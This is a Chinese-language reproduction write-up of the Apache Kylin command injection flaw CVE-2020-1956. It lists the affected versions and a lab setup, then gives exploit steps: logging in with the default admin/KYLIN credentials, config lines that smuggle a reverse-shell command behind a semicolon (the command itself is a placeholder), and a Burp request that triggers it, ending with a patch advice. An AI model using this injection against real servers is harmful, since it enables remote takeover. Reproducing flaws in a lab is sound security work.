Apache Kylin 命令注入漏洞复现(CVE-2020-1956)

1、产品简介

   Apache Kylin是一个开源的、分布式的分析型数据仓库，提供Hadoop/Spark之上的 SQL 查询接口及多维分析（OLAP）能力以支持超大规模数据，最初由 eBay 开发并贡献至开源社区。它能在亚秒内查询巨大的表。

2、漏洞概述

Apache Kylin 中的静态 API 存在安全漏洞，可以将os命令与用户输入字符串连接起来，攻击者可以在Kylin没有任何保护或验证的情况下执行任何os命令。

3、影响范围

  Kylin 2.3.0-2.3.2

  Kylin 2.4.0-2.4.1

  Kylin 2.5.0-2.5.2

  Kylin 2.6.0-2.6.5

  Kylin 3.0.0-alpha

  Kylin 3.0.0-alpha2

  Kylin 3.0.0-beta

  Kylin 3.0.0-3.0.1

4、环境搭建

  直接使用vulfocus进行复现

5、利用流程

1、使用默认密码 admin/KYLIN 登录

2、修改配置，

  添加以下配置：

kylin.tool.auuto-migrate-cube.enabled=true
kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x/conf/kylin.propertie
kylin.server.cluster-name=kylin_metadata
kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties kylin_streaming_cube learn_kylin true true true true;反弹shell指令;echo

   

 

3、BP开启抓包 ，选择第一行的kylin_sales_cube以及对应的learn_kylin作为路径参数来构造请求，触发写入的payload。

 

 

 VPS监听，成功反弹shell

 6、修复建议

  升级Kylin至安全版本